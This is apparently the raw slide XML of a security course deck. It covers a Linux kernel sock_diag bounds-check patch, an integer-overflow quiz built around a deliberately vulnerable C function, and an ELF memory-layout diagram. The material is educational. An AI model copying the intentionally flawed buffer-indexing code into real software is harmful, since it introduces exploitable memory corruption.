            </a:r>
            <a:endParaRPr sz="1600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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@@ -121,6 +121,9 @@ static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1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__sock_diag_rcv_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600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(struct sk_buff *skb, struct nlmsghdr *nlh)</a:t>
            </a:r>
            <a:endParaRPr sz="1600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="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   if (nlmsg_len(nlh) &lt; sizeof(*req))</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="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     return -EINVAL;</a:t>
            </a:r>
            <a:endParaRPr sz="1600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0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+  if (req-&gt;sdiag_family &gt;= AF_MAX)</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="008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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0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+    return -EINVAL;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="008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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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600" kern="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hndl = sock_diag_lock_handler(req-&gt;sdiag_family);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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if (hndl == NULL)</a:t>
            </a:r>
            <a:endParaRPr sz="1600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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	err = -ENOENT;</a:t>
            </a:r>
            <a:endParaRPr sz="1600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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else</a:t>
            </a:r>
            <a:endParaRPr sz="1600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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600" kern="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err = hndl-&gt;dump(skb, nlh);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="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...</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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035" name="Shape 2035"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6692000" y="1841433"/>
            <a:ext cx="5084400" cy="41324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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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static const inline struct sock_diag_handler *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1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sock_diag_lock_handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600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(int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="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family</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600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600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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	if (sock_diag_handlers[family] == NULL)</a:t>
            </a:r>
            <a:endParaRPr sz="1600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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    	request_module("net-pf-%d-proto-%d-type-%d", PF_NETLINK,</a:t>
            </a:r>
            <a:endParaRPr sz="1600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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                        NETLINK_SOCK_DIAG, family);</a:t>
            </a:r>
            <a:endParaRPr sz="1600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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1600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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	mutex_lock(&amp;sock_diag_table_mutex);</a:t>
            </a:r>
            <a:endParaRPr sz="1600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1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sock_diag_handlers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600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600" kern="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family</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600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];</a:t>
            </a:r>
            <a:endParaRPr sz="1600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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600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0" name="Shape 2040"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Integer Overflow Quiz</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2042" name="Shape 2042"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="9721850" cy="1731963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indent="-423323">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integer Overflow vulnerability can be regarded as some kind of logic bug.</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integer overflow itself cannot be exploited, it is usually used to trigger buffer overflow/heap overflow or used with ROP, ret2libc, etc.</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2041" name="Shape 2041"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5195867" y="4144933"/>
            <a:ext cx="6314400" cy="23364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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int test(short param, int value) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    int * mybuf = (int *)malloc(65536 * sizeof(int));</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    if (param &lt; 0) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>        param = -param;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    mybuf[param] = value;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    return mybuf; </a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF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600" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF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043" name="Shape 2043"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766733" y="4144933"/>
            <a:ext cx="3588800" cy="11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2667" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFAB40"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Quiz: can you find</a:t>
            </a:r>
            <a:endParaRPr sz="2667" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFAB40"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2667" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFAB40"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>the vuln?</a:t>
            </a:r>
            <a:endParaRPr sz="2667" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFAB40"/>
              </a:solidFill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68D2B68-29D0-47D9-A35F-5B70048C6E7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953381" y="1240934"/>
            <a:ext cx="82852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磁盘中的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ELF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（可执行文件）与内存中的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ELF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（进程内存映像）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Shape 740">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CB5F305-A1DB-4C02-BDEF-DC6932DB5002}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6388014" y="2416947"/>
            <a:ext cx="3580234" cy="3707900"/>
            <a:chOff x="4897550" y="1085100"/>
            <a:chExt cx="2768700" cy="3551150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Shape 741">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{224FE4C8-1E87-428D-AF07-083B8BF5CFE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1212775"/>
              <a:ext cx="1363200" cy="2742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rgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>For Kernel</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Shape 742">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FFAF310-7ADD-4648-AC81-A755F5404CB6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1486975"/>
              <a:ext cx="1363200" cy="274200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFF2C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/>
                <a:t>Stack</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Shape 743">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F579983-D946-419B-9E9A-CAC8423EC60E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1761175"/>
              <a:ext cx="1363200" cy="6039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Shape 744">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAE967AF-B2C7-4C2E-A3CF-DCF61E9CCE05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="2365075"/>
              <a:ext cx="1363200" cy="4428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/>
                <a:t>shared libraries</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Shape 745">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0C4FD20-8637-4BD7-BCA0-E25276816B1B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="2807875"/>
              <a:ext cx="1363200" cy="6039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Shape 746">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{010999C0-C7EE-4429-80E6-4D7C1F73C6DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="3411775"/>
              <a:ext cx="1363200" cy="274200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D9EA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/>
                <a:t>Heap</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Shape 747">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D47F4C6-7252-41C7-A01C-95FF5B1D73A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="3685975"/>
              <a:ext cx="1363200" cy="274200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F4CCC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Data</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Shape 748">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3064F38-82FD-43F8-8742-542BED83C265}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="3960175"/>
              <a:ext cx="1363200" cy="274200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFF2C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/>
                <a:t>Code</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Shape 749">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FFC1073-413A-4427-B54D-090BD34DFF40}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="4234375"/>
              <a:ext cx="1363200" cy="2742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</a:rPr>
                <a:t>Unused</a:t>
              </a:r>
              <a:endParaRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Shape 750">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DC2CBF9-E21C-48AD-8569-4F9B50ABA1E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="13" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5579150" y="1761175"/>
              <a:ext cx="0" cy="367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1" name="Shape 751">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E80FE881-313C-474F-B090-9586544F7ED9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="16" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5579150" y="3077575"/>
              <a:ext cx="0" cy="334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22" name="Shape 752">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB3339EC-C1FE-4AF0-96D7-86ADFB18395E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="1085100"/>
              <a:ext cx="1047000" cy="27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Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0xFFFFFFFF</a:t>
              </a:r>
              <a:endParaRPr sz="100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23" name="Shape 753">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89AEC428-84EE-42EB-9CB0-38DC942D41B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="1359300"/>
              <a:ext cx="1047000" cy="27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Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0xC0000000</a:t>
              </a:r>
              <a:endParaRPr sz="100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24" name="Shape 754">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E23F1A5D-9C35-4822-BED5-F09A0BF4E96C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="2674225"/>
              <a:ext cx="1047000" cy="27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Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0x40000000</a:t>
              </a:r>
              <a:endParaRPr sz="100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25" name="Shape 755">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1599F529-BFA5-4492-89D1-C9B84595ADE6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="4058550"/>
              <a:ext cx="1047000" cy="27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Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>0x08048000</a:t>
              </a:r>
              <a:endParaRPr sz="100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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="26" name="Shape 756">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02CB3132-6F87-44F7-86BB-A45C4F89CCD3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="1218750"/>
              <a:ext cx="358500" cy="6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7" name="Shape 757">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55AFF7F8-A0A7-4552-9B06-FB5BF3290976}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="1492950"/>
              <a:ext cx="358500" cy="6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8" name="Shape 758">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0228E6C0-C255-441C-933B-11D668E2B58E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="2807875"/>
              <a:ext cx="358500" cy="6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9" name="Shape 759">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73BAE51A-DD40-47C5-AA6C-9A20CC5E0449}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4221500"/>
              <a:ext cx="358500" cy="6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0" name="Shape 760">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC64E16-F6E5-4F12-B821-7AA037709445}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4495700"/>
